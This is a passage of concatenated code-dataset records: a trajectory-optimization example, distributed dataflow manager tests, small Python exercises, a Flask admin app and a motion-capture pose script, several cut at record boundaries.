'(1.5658*alpha + -0.0000)'\nCd = '(1.6537*alpha**2 + 0.0612)'\nD = '(0.5*{}*v**2*{}*Aref)'.format(rho, Cd)\nL = '(0.5*{}*v**2*{}*Aref)'.format(rho, Cl)\nr = '(re+h)'\n\n# Define equations of motion\nocp_2 \\\n .state('h', 'v*sin(gam)', 'm') \\\n .state('theta', 'v*cos(gam)*cos(psi)/({}*cos(phi))'.format(r), 'rad') \\\n .state('phi', 'v*cos(gam)*sin(psi)/{}'.format(r), 'rad') \\\n .state('v', '-{}/mass - mu*sin(gam)/{}**2'.format(D,r), 'm/s') \\\n .state('gam', '{}*cos(bank)/(mass*v) - mu/(v*{}**2)*cos(gam) + v/{}*cos(gam)'.format(L,r,r), 'rad') \\\n .state('psi', '{}*sin(bank)/(mass*cos(gam)*v) - v/{}*cos(gam)*cos(psi)*tan(phi)'.format(L,r), 'rad')\n\n# Define controls\nocp_2.control('alpha', 'rad') \\\n .control('bank', 'rad')\n\n# Define costs\nocp_2.terminal_cost('-v^2', 'm^2/s^2')\n\n# Define constraints\nocp_2.constraints() \\\n .initial('h-h_0', 'm') \\\n .initial('theta-theta_0', 'rad') \\\n .initial('phi-phi_0', 'rad') \\\n .initial('v-v_0', 'm/s') \\\n .initial('gam-gam_0', 'rad') \\\n .initial('psi-psi_0', 'rad') \\\n .terminal('h-h_f', 'm') \\\n .terminal('theta-theta_f', 'rad') \\\n .terminal('phi-phi_f', 'rad')\n\n# Define constants\nocp_2.constant('mu', 3.986e5*1e9, 'm**3/s**2') # Gravitational parameter, m**3/s**2\nocp_2.constant('rho0', 1.2, 'kg/m**3') # Sea-level atmospheric density, kg/m**3\nocp_2.constant('H', 7500, 'm') # Scale height for atmosphere of Earth, m\nocp_2.constant('mass', 750/2.2046226, 'kg') # Mass of vehicle, kg\nocp_2.constant('re', 6378000, 'm') # Radius of planet, m\nocp_2.constant('Aref', pi*(24*.0254/2)**2, 'm**2') # Reference area of vehicle, m**2\nocp_2.constant('rn', 1/12*0.3048, 'm') # Nose radius, m\nocp_2.constant('h_0', sol.y[0,0], 'm')\nocp_2.constant('theta_0', sol.y[0,1], 'rad')\nocp_2.constant('phi_0', 0, 'rad')\nocp_2.constant('v_0', sol.y[0,2], 'm/s')\nocp_2.constant('gam_0', sol.y[0,3], 'rad')\nocp_2.constant('psi_0', 0, 'rad')\nocp_2.constant('h_f', sol.y[-1,0], 'm')\nocp_2.constant('theta_f', sol.y[-1,1], 'rad')\nocp_2.constant('phi_f', 0, 'rad')\n\nocp_2.scale(m='h', s='h/v', kg='mass', rad=1)\n\nbvp_solver_2 = beluga.bvp_algorithm('Shooting',\n derivative_method='fd',\n tolerance=1e-4,\n max_iterations=100,\n max_error=400,\n algorithm='SLSQP'\n )\n\nguess_maker_2 = beluga.guess_generator('auto',\n 
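# warm-start: seed the 3DOF guess with the converged planar solution's states, costates and control\n 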
start=[sol.y[0,0], sol.y[0,1], 0, sol.y[0,2], sol.y[0,3], 0],\n direction='forward',\n costate_guess=[sol.y[0,4], sol.y[0,5], -0.01, sol.y[0,6], sol.y[0,7], -0.01],\n control_guess=[sol.u[0,0], 0.0],\n use_control_guess=True,\n time_integrate=sol.t[-1],\n )\n\ncontinuation_steps_2 = beluga.init_continuation()\n\ncontinuation_steps_2.add_step('bisection').num_cases(3) \\\n .const('h_f', sol.y[-1,0]) \\\n .const('theta_f', sol.y[-1,1]) \\\n .const('phi_f', 0)\n\ncontinuation_steps_2.add_step('bisection').num_cases(41) \\\n .const('phi_f', 2*pi/180)\n\nsol = beluga.solve(ocp_2,\n method='traditional',\n bvp_algorithm=bvp_solver_2,\n steps=continuation_steps_2,\n guess_generator=guess_maker_2)\n","sub_path":"examples/4-hypersonic3dof/planarto3dof.py","file_name":"planarto3dof.py","file_ext":"py","file_size_in_byte":7268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48951343","text":"#\n# ICRAR - International Centre for Radio Astronomy Research\n# (c) UWA - The University of Western Australia, 2015\n# Copyright by UWA (in the framework of the ICRAR)\n# All rights reserved\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this library; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place, Suite 330, Boston,\n# MA 02111-1307 USA\n#\nimport json\nimport random\nimport string\nimport subprocess\nimport sys\nimport threading\nimport time\nimport unittest\n\nimport Pyro4\nimport pkg_resources\n\nfrom dfms import droputils\nfrom dfms import ngaslite, utils\nfrom dfms.ddap_protocol import DROPStates\nfrom dfms.drop import BarrierAppDROP\nfrom dfms.manager.node_manager import NodeManager\nfrom dfms.manager.repository import memory, sleepAndCopy\nfrom dfms.manager.session import SessionStates\nfrom test.manager import testutils\n\n\nhostname = 'localhost'\n\nclass ErroneousApp(BarrierAppDROP):\n def run(self):\n raise Exception(\"Sorry, we always fail\")\n\nclass TestDM(unittest.TestCase):\n\n def test_error_listener(self):\n\n evt = threading.Event()\n erroneous_drops = []\n class listener(object):\n def on_error(self, drop):\n erroneous_drops.append(drop.uid)\n if len(erroneous_drops) == 2: # both 'C' and 'B' failed already\n evt.set()\n\n sessionId = 'lala'\n dm = NodeManager(useDLM=False, error_listener=listener())\n g = [{\"oid\":\"A\", \"type\":\"plain\", \"storage\": \"memory\"},\n {\"oid\":\"B\", \"type\":\"app\", \"app\":\"test.manager.test_dm.ErroneousApp\", \"inputs\": [\"A\"]},\n {\"oid\":\"C\", \"type\":\"plain\", \"storage\": \"memory\", \"producers\":[\"B\"]}]\n dm.createSession(sessionId)\n dm.addGraphSpec(sessionId, g)\n dm.deploySession(sessionId, [\"A\"])\n\n self.assertTrue(evt.wait(10), \"Didn't receive errors on time\")\n\n def test_runGraphOneDOPerDOM(self):\n \"\"\"\n A test that creates three DROPs in two different DMs, wire two of\n them together externally (i.e., using their proxies), and runs the graph.\n For this the graphs that are fed into the 
DMs must *not* express the\n inter-DM relationships. The graph looks like:\n\n DM #1 DM #2\n ======= =============\n | A --|----|-> B --> C |\n ======= =============\n \"\"\"\n dm1 = NodeManager(useDLM=False)\n dm2 = NodeManager(useDLM=False)\n\n sessionId = 's1'\n g1 = [{\"oid\":\"A\", \"type\":\"plain\", \"storage\": \"memory\"}]\n g2 = [{\"oid\":\"B\", \"type\":\"app\", \"app\":\"dfms.apps.crc.CRCApp\"},\n {\"oid\":\"C\", \"type\":\"plain\", \"storage\": \"memory\", \"producers\":[\"B\"]}]\n\n uris1 = dm1.quickDeploy(sessionId, g1)\n uris2 = dm2.quickDeploy(sessionId, g2)\n self.assertEquals(1, len(uris1))\n self.assertEquals(2, len(uris2))\n\n # We externally wire the Proxy objects now\n a = Pyro4.Proxy(uris1['A'])\n b = Pyro4.Proxy(uris2['B'])\n c = Pyro4.Proxy(uris2['C'])\n a.addConsumer(b)\n\n # Run! We wait until c is completed\n with droputils.EvtConsumerProxyCtx(self, c, 1):\n a.write('a')\n a.setCompleted()\n\n for drop in a, b, c:\n self.assertEquals(DROPStates.COMPLETED, drop.status)\n self.assertEquals(a.checksum, int(droputils.allDropContents(c)))\n\n for dropProxy in a,b,c:\n dropProxy._pyroRelease()\n\n dm1.destroySession(sessionId)\n dm2.destroySession(sessionId)\n\n def test_runGraphSeveralDropsPerDM(self):\n \"\"\"\n A test that creates several DROPs in two different DMs and runs\n the graph. The graph looks like this\n\n DM #1 DM #2\n =================== ================\n | A --> C --> D --|----|-| |\n | | | |--> E --> F |\n | B --------------|----|-| |\n =================== ================\n\n :see: `self.test_runGraphSingleDOPerDOM`\n \"\"\"\n dm1 = NodeManager(useDLM=False)\n dm2 = NodeManager(useDLM=False)\n\n sessionId = 's1'\n g1 = [{\"oid\":\"A\", \"type\":\"plain\", \"storage\": \"memory\", \"consumers\":[\"C\"]},\n {\"oid\":\"B\", \"type\":\"plain\", \"storage\": \"memory\"},\n {\"oid\":\"C\", \"type\":\"app\", \"app\":\"dfms.apps.crc.CRCApp\"},\n {\"oid\":\"D\", \"type\":\"plain\", \"storage\": \"memory\", \"producers\": [\"C\"]}]\n g2 = [{\"oid\":\"E\", \"type\":\"app\", \"app\":\"test.test_drop.SumupContainerChecksum\"},\n {\"oid\":\"F\", \"type\":\"plain\", \"storage\": \"memory\", \"producers\":[\"E\"]}]\n\n uris1 = dm1.quickDeploy(sessionId, g1)\n uris2 = dm2.quickDeploy(sessionId, g2)\n self.assertEquals(4, len(uris1))\n self.assertEquals(2, len(uris2))\n\n # We externally wire the Proxy objects to establish the inter-DM\n # relationships\n a = Pyro4.Proxy(uris1['A'])\n b = Pyro4.Proxy(uris1['B'])\n c = Pyro4.Proxy(uris1['C'])\n d = Pyro4.Proxy(uris1['D'])\n e = Pyro4.Proxy(uris2['E'])\n f = Pyro4.Proxy(uris2['F'])\n for drop,uid in [(a,'A'),(b,'B'),(c,'C'),(d,'D'),(e,'E'),(f,'F')]:\n self.assertEquals(uid, drop.uid, \"Proxy is not the DROP we think should be (assumed: %s/ actual: %s)\" % (uid, drop.uid))\n e.addInput(d)\n e.addInput(b)\n\n # Run! 
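(writing to A and B below triggers C and D, then E and F) 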
The sole fact that this doesn't throw exceptions is already\n # a good proof that everything is working as expected\n with droputils.EvtConsumerProxyCtx(self, f, 5):\n a.write('a')\n a.setCompleted()\n b.write('a')\n b.setCompleted()\n\n for drop in a,b,c,d,e,f:\n self.assertEquals(DROPStates.COMPLETED, drop.status, \"DROP %s is not COMPLETED\" % (drop.uid))\n\n self.assertEquals(a.checksum, int(droputils.allDropContents(d)))\n self.assertEquals(b.checksum + d.checksum, int(droputils.allDropContents(f)))\n\n for dropProxy in a,b,c,d,e,f:\n dropProxy._pyroRelease()\n\n dm1.destroySession(sessionId)\n dm2.destroySession(sessionId)\n\n def test_runWithFourDMs(self):\n \"\"\"\n A test that creates several DROPs in two different DMs and runs\n the graph. The graph looks like this\n\n DM #2\n +--------------------------+\n | |--> C --| |\n +---|--> B --|--> D --|--> F --|--|\n | | |--> E --| | |\n DM #1 | +--------------------------+ | DM #4\n +-----+ | | +---------------------+\n | | | |--|--> L --| |\n | A --|--+ | |--> N --> O |\n | | | |--|--> M --| |\n +-----+ | DM #3 | +---------------------+\n | +--------------------------+ |\n | | |--> H --| | |\n +---|--> G --|--> I --|--> K --|--|\n | |--> J --| |\n +--------------------------+\n\n B, F, G, K and N are AppDOs; the rest are plain in-memory DROPs\n \"\"\"\n\n dm1 = NodeManager(useDLM=False)\n dm2 = NodeManager(useDLM=False)\n dm3 = NodeManager(useDLM=False)\n dm4 = NodeManager(useDLM=False)\n\n sessionId = 's1'\n g1 = [memory('A', expectedSize=1)]\n g2 = [sleepAndCopy('B', outputs=['C','D','E'], sleepTime=0),\n memory('C'),\n memory('D'),\n memory('E'),\n sleepAndCopy('F', inputs=['C','D','E'], sleepTime=0)]\n g3 = [sleepAndCopy('G', outputs=['H','I','J'], sleepTime=0),\n memory('H'),\n memory('I'),\n memory('J'),\n sleepAndCopy('K', inputs=['H','I','J'], sleepTime=0)]\n g4 = [memory('L'),\n memory('M'),\n sleepAndCopy('N', inputs=['L','M'], outputs=['O'], sleepTime=0),\n memory('O')]\n\n uris1 = dm1.quickDeploy(sessionId, g1)\n uris2 = dm2.quickDeploy(sessionId, g2)\n uris3 = dm3.quickDeploy(sessionId, g3)\n uris4 = dm4.quickDeploy(sessionId, g4)\n self.assertEquals(1, len(uris1))\n self.assertEquals(5, len(uris2))\n self.assertEquals(5, len(uris3))\n self.assertEquals(4, len(uris4))\n allUris = {}\n allUris.update(uris1)\n allUris.update(uris2)\n allUris.update(uris3)\n allUris.update(uris4)\n\n # We externally wire the Proxy objects to establish the inter-DM\n # relationships. Intra-DM relationships are already established\n proxies = {}\n for uid,uri in allUris.viewitems():\n proxies[uid] = Pyro4.Proxy(uri)\n\n a = proxies['A']\n b = proxies['B']\n f = proxies['F']\n g = proxies['G']\n k = proxies['K']\n l = proxies['L']\n m = proxies['M']\n o = proxies['O']\n\n a.addConsumer(b)\n a.addConsumer(g)\n f.addOutput(l)\n k.addOutput(m)\n\n # Run! 
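(a single write into A fans out across all four DMs) 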
This should trigger the full execution of the graph\n with droputils.EvtConsumerProxyCtx(self, o, 1):\n a.write('a')\n\n for dropProxy in proxies.viewvalues():\n self.assertEquals(DROPStates.COMPLETED, dropProxy.status, \"Status of '%s' is not COMPLETED: %d\" % (dropProxy.uid, dropProxy.status))\n dropProxy._pyroRelease()\n\n for dm in [dm1, dm2, dm3, dm4]:\n dm.destroySession(sessionId)\n\n def test_many_relationships(self):\n \"\"\"\n A test in which a drop is related to many other drops that live in a\n separate DM (and thus requires many Pyro connections).\n\n Drop A is accessed by many applications (B1, B2, .., BN), which should\n not exhaust resources on DM #1 (in particular, the pyro thread pool).\n We collapse all into C so we can monitor only its status to know that\n the execution is over.\n\n DM #1 DM #2\n ======= ====================\n | | | |--> B1 --| |\n | | | |--> B2 --| |\n | A --|----|-|--> B3 --|--> C |\n | | | |.........| |\n | | | |--> BN --| |\n ======= ====================\n \"\"\"\n dm1 = NodeManager(useDLM=False)\n dm2 = NodeManager(useDLM=False)\n\n sessionId = 's1'\n N = 100\n g1 = [{\"oid\":\"A\", \"type\":\"plain\", \"storage\": \"memory\"}]\n g2 = [{\"oid\":\"C\", \"type\":\"plain\", \"storage\": \"memory\"}]\n for i in xrange(N):\n b_oid = \"B%d\" % (i,)\n # SleepAndCopyApp effectively opens the input drop\n g2.append({\"oid\":b_oid, \"type\":\"app\", \"app\":\"test.graphsRepository.SleepAndCopyApp\", \"outputs\":[\"C\"], \"sleepTime\": 0})\n\n uris1 = dm1.quickDeploy(sessionId, g1)\n uris2 = dm2.quickDeploy(sessionId, g2)\n self.assertEquals(1, len(uris1))\n self.assertEquals(1+N, len(uris2))\n\n # We externally wire the Proxy objects to establish the inter-DM\n # relationships. Make sure we release the proxies\n with Pyro4.Proxy(uris1['A']) as a:\n for i in xrange(N):\n with Pyro4.Proxy(uris2['B%d' % (i,)]) as b:\n b.addInput(a, False)\n a.addConsumer(b, False)\n\n # Run! 
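(A feeds all N B apps, which collapse into C) 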
The sole fact that this doesn't throw exceptions is already\n # a good proof that everything is working as expected\n c = Pyro4.Proxy(uris2['C'])\n with droputils.EvtConsumerProxyCtx(self, c, 5):\n a.write('a')\n a.setCompleted()\n\n dm1.destroySession(sessionId)\n dm2.destroySession(sessionId)\n\nclass TestREST(unittest.TestCase):\n\n def test_fullRound(self):\n \"\"\"\n A test that exercises most of the REST interface exposed on top of the\n NodeManager\n \"\"\"\n\n sessionId = 'lala'\n restPort = 8888\n\n args = [sys.executable, '-m', 'dfms.manager.cmdline', 'dfmsNM', \\\n '--port', str(restPort), '-qqq']\n dmProcess = subprocess.Popen(args)\n\n with testutils.terminating(dmProcess, 10):\n\n # Wait until the REST server becomes alive\n self.assertTrue(utils.portIsOpen('localhost', restPort, 10), \"REST server didn't come up in time\")\n\n # The DM is still empty\n dmInfo = testutils.get(self, '', restPort)\n self.assertEquals(0, len(dmInfo['sessions']))\n\n # Create a session and check it exists\n testutils.post(self, '/sessions', restPort, '{\"sessionId\":\"%s\"}' % (sessionId))\n dmInfo = testutils.get(self, '', restPort)\n self.assertEquals(1, len(dmInfo['sessions']))\n self.assertEquals(sessionId, dmInfo['sessions'][0]['sessionId'])\n self.assertEquals(SessionStates.PRISTINE, dmInfo['sessions'][0]['status'])\n\n # Add this complex graph spec to the session\n # The UID of the two leaf nodes of this complex.js graph are T and S\n # PRO-242: use timestamps for final DROPs that get archived into the public NGAS\n graph = json.loads(pkg_resources.resource_string('test', 'graphs/complex.js')) # @UndefinedVariable\n suffix = '_' + str(int(time.time()))\n oidsToReplace = ('S','T')\n for dropSpec in graph:\n if dropSpec['oid'] in oidsToReplace:\n dropSpec['oid'] += suffix\n for rel in ('inputs','outputs'):\n if rel in dropSpec:\n for oid in dropSpec[rel][:]:\n if oid in oidsToReplace:\n dropSpec[rel].remove(oid)\n dropSpec[rel].append(oid + suffix)\n\n testutils.post(self, '/sessions/%s/graph/append' % (sessionId), restPort, json.dumps(graph))\n\n # We create two final archiving nodes, but this time from a template\n # available on the server-side\n timeout = 10\n testutils.post(self, '/templates/dfms.manager.repository.archiving_app/materialize?uid=archiving1&host=ngas.ddns.net&port=7777&sessionId=%s&connect_timeout=%f&timeout=%f' % (sessionId, timeout, timeout), restPort)\n testutils.post(self, '/templates/dfms.manager.repository.archiving_app/materialize?uid=archiving2&host=ngas.ddns.net&port=7777&sessionId=%s&connect_timeout=%f&timeout=%f' % (sessionId, timeout, timeout), restPort)\n\n # And link them to the leaf nodes of the complex graph\n testutils.post(self, '/sessions/%s/graph/link?rhOID=archiving1&lhOID=S%s&linkType=0' % (sessionId, suffix), restPort)\n testutils.post(self, '/sessions/%s/graph/link?rhOID=archiving2&lhOID=T%s&linkType=0' % (sessionId, suffix), restPort)\n\n # Now we deploy the graph...\n testutils.post(self, '/sessions/%s/deploy' % (sessionId), restPort, 'completed=SL_A,SL_B,SL_C,SL_D,SL_K', mimeType='application/x-www-form-urlencoded')\n\n # ...and write to all 5 root nodes that are listening in ports\n # starting at 1111\n msg = ''.join([random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in xrange(10)])\n for i in xrange(5):\n self.assertTrue(utils.writeToRemotePort('localhost', 1111+i, msg, 2), \"Couldn't write data to localhost:%d\" % (1111+i))\n\n # Wait until the graph has finished its execution. 
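(the session moves from RUNNING to FINISHED) 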
We'll know\n # it finished by polling the status of the session\n while testutils.get(self, '/sessions/%s/status' % (sessionId), restPort) == SessionStates.RUNNING:\n time.sleep(0.2)\n\n self.assertEquals(SessionStates.FINISHED, testutils.get(self, '/sessions/%s/status' % (sessionId), restPort))\n testutils.delete(self, '/sessions/%s' % (sessionId), restPort)\n\n # We put an NGAS archiving at the end of the chain, let's check that the DROPs were copied over there\n # Since the graph consists of several SleepAndCopy apps, T should contain the message repeated\n # 9 times, and S should have it 4 times\n def checkReplica(dropId, copies):\n response = ngaslite.retrieve('ngas.ddns.net', dropId)\n buff = response.read()\n self.assertEquals(msg*copies, buff, \"%s's replica doesn't look correct\" % (dropId))\n checkReplica('T%s' % (suffix), 9)\n checkReplica('S%s' % (suffix), 4)","sub_path":"test/manager/test_dm.py","file_name":"test_dm.py","file_ext":"py","file_size_in_byte":17231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"500053288","text":"## Problem1 (https://leetcode.com/problems/remove-duplicates-from-sorted-array-ii/)\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n if nums == [] or len(nums)==0:\n return []\n slow = 1\n fast = 1\n count = 1\n while fast 0 and ((price1 * 100) % 5) == 0:\n print(price1)\n print(\"Menu for deposits:\")\n print('\\'n\\' - deposit a nickel')\n print('\\'d\\' - deposit a dime')\n print('\\'q\\' - deposit a quarter')\n print('\\'o\\' - deposit a one dollar bill')\n print('\\'f\\' - deposit a five dollar bill')\n print('\\'c\\' - to cancel purchase')\n #dollar = round(price1//1)\n\n cents = round(price1*100)\n # cents\n dollar1 = 100\n nickel = 5\n quarter = 25\n dime = 10\n amountpaid = 0\n if True:\n amountpaid = 0\n while cents > 0:\n deposit = input(\"Indicate your deposit:\")\n if deposit == 'n':\n cents = cents - 5\n amountpaid = amountpaid + 5\n elif deposit == 'd':\n cents = cents - 10\n amountpaid = amountpaid + 10\n elif deposit == 'q':\n cents = cents - 25\n amountpaid = amountpaid + 25\n elif deposit == 'o':\n cents = cents - 100\n amountpaid = amountpaid + 100\n elif deposit == 'f':\n cents = cents - 500\n amountpaid = amountpaid + 500\n elif deposit == 'c':\n break\n dollar = cents // 100\n if dollar >0:\n print(\"Payment due\",dollar,'dollar',cents%100,'cents')\n else:\n print(\"Payment due\",cents%100,\"cents\")\n\n print('Please take your change below\\n',round(abs(cents)),\"cents\")\n continue\n else:\n print(\"Illegal price: Must be a non-negative multiple of 5 cents.\")\n\n\n","sub_path":"src/chapter5/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"328080254","text":"#!/usr/bin/python3\n\"\"\"\nDefines the text_indentation function.\n\"\"\"\n\n\ndef text_indentation(text):\n \"\"\"\n Print text with two new lines after each '.', '?' and ':'.\n \"\"\"\n if not isinstance(text, str):\n raise TypeError('text must be a string')\n\n text_cpy = text[:]\n\n text_cpy = text_cpy.replace(\"?\", \"?<>\")\n text_cpy = text_cpy.replace(\":\", \":<>\")\n text_cpy = text_cpy.replace(\".\", \".<>\")\n\n text_split = text_cpy.split('<>')\n\n for i in range(len(text_split)):\n text_split[i] = text_split[i].strip()\n\n for i in range(len(text_split)):\n if i == len(text_split) - 1:\n print(\"{}\".format(text_split[i]), end='')\n else:\n 
print(\"{}\\n\".format(text_split[i]))\n","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387412261","text":"import os\nfrom flask import Flask, render_template, send_from_directory\nfrom flask_restful import Api\n\n# import all the models\nfrom modelos.usuario import *\nfrom modelos.departamento import *\nfrom modelos.reserva import *\nfrom modelos.contacto import *\nfrom modelos.actividad import *\nfrom modelos.foto import *\n\n# implamentacion\nfrom modelos.implementacion import *\napp = Flask(__name__)\napi = Api(app)\nurl = os.path.dirname(os.path.realpath(__file__))\nUPLOAD_FOLDER = url + \"/documentos\"\n\n# making default routes pages\n@app.route(\"/\")\ndef index():\n return render_template(\"web-index.html\")\n\n\n# making default routes pages\n@app.route(\"/404\")\ndef page404():\n return render_template(\"404.html\")\n\n\n# admin URL\n@app.route(\"/nv-login\")\ndef login():\n return render_template(\"admin/login.html\")\n\n\n@app.route(\"/admin-actividad\")\ndef actividad_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = actividadImp.getvromView(cursor)\n\n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-actividad/registros.html\", datos=datos) \n except Exception as error:\n print(error.__str__())\n \n\n@app.route(\"/admin-actividad/registro\")\ndef actividad_form():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = reservaImp.getfromTable(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-actividad/formulario.html\", reservas=datos)\n except Exception as error:\n print(error.__str__())\n \n\n@app.route(\"/admin-dept\")\ndef dept_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = departamentoImp.getfromTable(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-dept/registros.html\", departamentos = datos)\n except Exception as error:\n print(error.__str__())\n \n \n@app.route(\"/admin-dept/registro\")\ndef dept_form():\n return render_template(\"admin-dept/formulario.html\")\n\n\n@app.route(\"/admin-contacto\")\ndef contacto_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = contactoImp.getfromView(cursor)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-contacto/registros.html\", contactos = datos)\n except Exception as error:\n print(error.__str__())\n\n\n@app.route(\"/admin-contacto/registro\")\ndef contacto_form():\n try:\n param = request.args.get(\"id\", None)\n\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = contactoImp.get_disponible(cursor, param)\n \n cursor.close()\n db.connectionPool.putconn(connection)\n return render_template(\"admin-contacto/formulario.html\", reservas=datos)\n\n except Exception as error:\n print(error.__str__())\n\n\n@app.route(\"/admin-user\")\ndef usuario_registro():\n try:\n db = DataBase()\n connection = db.connectionPool.getconn()\n cursor = connection.cursor()\n\n datos = usuarioImp.getfromTable(cursor)\n \n cursor.close()\n 
db.connectionPool.putconn(connection)\n\n        return render_template(\"admin-usuario/registros.html\", usuarios=datos)\n    except Exception as error:\n        print(error.__str__())\n\n\n@app.route(\"/admin-user/registro\")\ndef usuario_form():\n    try:\n        return render_template(\"admin-usuario/formulario.html\")\n    except Exception as error:\n        print(error.__str__())\n\n\n@app.route(\"/admin-reserva\")\ndef reserva_registro():\n    try:\n        db = DataBase()\n        connection = db.connectionPool.getconn()\n        cursor = connection.cursor()\n\n        datos = reservaImp.getfromTable(cursor)\n        \n        cursor.close()\n        db.connectionPool.putconn(connection)\n\n        return render_template(\"admin-reserva/registros.html\", reservas=datos)\n    except Exception as error:\n        print(error.__str__())\n\n@app.route(\"/admin-reserva/registro\")\ndef reserva_form():\n    try:\n        db = DataBase()\n        connection = db.connectionPool.getconn()\n        cursor = connection.cursor()\n\n        datos = departamentoImp.getfromTable(cursor)\n        \n        cursor.close()\n        db.connectionPool.putconn(connection)\n        return render_template(\"admin-reserva/formulario.html\", departamentos = datos)\n    except Exception as error:\n        print(error.__str__())\n\n\n@app.route(\"/admin-foto\")\ndef foto_registro():\n    try:\n        db = DataBase()\n        connection = db.connectionPool.getconn()\n        cursor = connection.cursor()\n\n        datos = fotoImp.getfromView(cursor)\n        \n        cursor.close()\n        db.connectionPool.putconn(connection)\n        return render_template(\"admin-foto/registros.html\", fotos = datos)\n    except Exception as error:\n        print(error.__str__())\n\n\n@app.route(\"/admin-foto/registro\")\ndef foto_form():\n    try:\n        db = DataBase()\n        connection = db.connectionPool.getconn()\n        cursor = connection.cursor()\n\n        datos = reservaImp.getfromTable(cursor)\n        \n        cursor.close()\n        db.connectionPool.putconn(connection)\n        return render_template(\"admin-foto/formulario.html\", reservas = datos)\n    except Exception as error:\n        print(error.__str__())\n\n\n@app.route('/multimedia/<filename>')\ndef uploaded_file(filename):\n    return send_from_directory(UPLOAD_FOLDER,filename)\n\n# errors\n@app.errorhandler(404)\ndef notFound(e):\n    return render_template(\"404.html\")\n\n\n# adding routes for the API\napi.add_resource(usuarios, '/nv-api/usuarios')\napi.add_resource(usuario, '/nv-api/usuarios/')\napi.add_resource(departamentos, '/nv-api/departamentos')\napi.add_resource(departamento, '/nv-api/departamentos/')\napi.add_resource(reservas, '/nv-api/reservas')\napi.add_resource(reserva, '/nv-api/reservas/')\napi.add_resource(contactos, '/nv-api/contactos')\napi.add_resource(contacto, '/nv-api/contactos/')\napi.add_resource(actividades, '/nv-api/actividades')\napi.add_resource(actividad, '/nv-api/actividades/')\napi.add_resource(fotos, '/nv-api/fotos')\napi.add_resource(foto, '/nv-api/fotos/')\n\n# setting port to our application\nif __name__ == '__main__':\n    # Threaded option to enable multiple instances for multiple user access support\n    app.run(threaded=True, port=5000)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"181989764","text":"import util\n\nfrom typing import Union, Iterable, List, Dict\n# Union[np.ndarray, Iterable, int, float]\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport pickle\nimport prettytable\n\n\ndef main():\n    \"\"\"\n    This script's goal is to extract drone pose (position + orientation) from MC (motion capture) data.\n    \"\"\"\n    
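# Per-flight pipeline: locate the CSV, clean the raw markers, fit the poses, pickle the result.\n 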
# Path extraction of the MC data\n    print('Processing data path.')\n    f = util.DataFolder(data_folder_name='data_drone2')\n    print()\n\n    for vol_number in [0, 1, 2, 3, 4]:\n        csv_path = f.get_unique_file_path(extension='.csv', specific_folder=f.folders['raw'][vol_number])\n        # Extract poses of the drone from the motion capture measures\n        print(f'Importing flight located in {csv_path}\\nCleaning raw data.')\n        m = MCAnalysis(csv_path) # Importing and cleaning data\n        data = m.get_data()\n        print('Computing poses from Motion Capture measures.')\n        poses = m.get_pose() # Extracting the pose from markers position\n        print('Saving computed poses.')\n        data.df['time'] = pd.Series([i / 120 for i in range(len(data))])\n        data.df['pose'] = pd.Series(poses)\n        pickle.dump(data.df, open(f.folders['raw_python'][vol_number] + 'mc_measure.pkl', 'wb')) # Saving\n        print('\\n\\n')\n\n\nclass MCAnalysis(object):\n    \"\"\"\n    MCAnalysis groups the methods to extract the pose from the motion capture data.\n    \"\"\"\n\n    def __init__(self, path: str):\n        \"\"\"\n        Load raw MC data. z is the vertical axis oriented from down to top.\n        :param path: path of the .csv file of mc data.\n        \"\"\"\n        # Naming columns and removing headers\n        self.columns = ['frame_id', 'sub_frame',\n                        'b1_x', 'b1_y', 'b1_z',\n                        'b2_x', 'b2_y', 'b2_z',\n                        'b3_x', 'b3_y', 'b3_z',\n                        'b4_x', 'b4_y', 'b4_z',\n                        'y1_x', 'y1_y', 'y1_z',\n                        'y2_x', 'y2_y', 'y2_z',\n                        'x2_x', 'x2_y', 'x2_z',\n                        'clapet_inf1_x', 'clapet_inf1_y', 'clapet_inf1_z',\n                        'clapet_inf2_x', 'clapet_inf2_y', 'clapet_inf2_z',\n                        'clapet_sup_2_x', 'clapet_sup_2_y', 'clapet_sup_2_z']\n        self.points_name = ['b1', 'b2', 'b3', 'b4', 'y1', 'y2', 'x2']\n\n        data_raw: pd.DataFrame = pd.read_csv(path, sep=';', header=0, names=self.columns)\n\n        # Drop headers\n        data_raw = data_raw.iloc[4:, :].reset_index(drop=True)\n\n        # Casting types\n        dtypes = {e: ('float64' if i > 1 else 